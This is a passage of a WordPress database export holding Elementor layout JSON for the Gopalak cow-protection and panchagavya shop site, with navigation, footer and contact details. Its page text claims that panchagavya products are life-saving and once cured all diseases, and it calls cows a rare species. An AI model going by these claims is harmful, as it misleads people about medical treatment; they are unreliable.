",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11918,1975,'_elementor_page_assets','a:0:{}'),(11921,1976,'_elementor_edit_mode','builder'),(11922,1976,'_elementor_template_type','wp-page'),(11923,1976,'_elementor_version','3.7.8'),(11924,1976,'_wp_page_template','elementor_canvas'),(11925,1976,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"08fdbe7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bc55a55\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfae959\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11926,1976,'_elementor_page_assets','a:0:{}'),(11928,1977,'_elementor_edit_mode','builder'),(11929,1977,'_elementor_template_type','wp-page'),(11930,1977,'_elementor_version','3.7.8'),(11931,1977,'_wp_page_template','elementor_canvas'),(11932,1977,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\"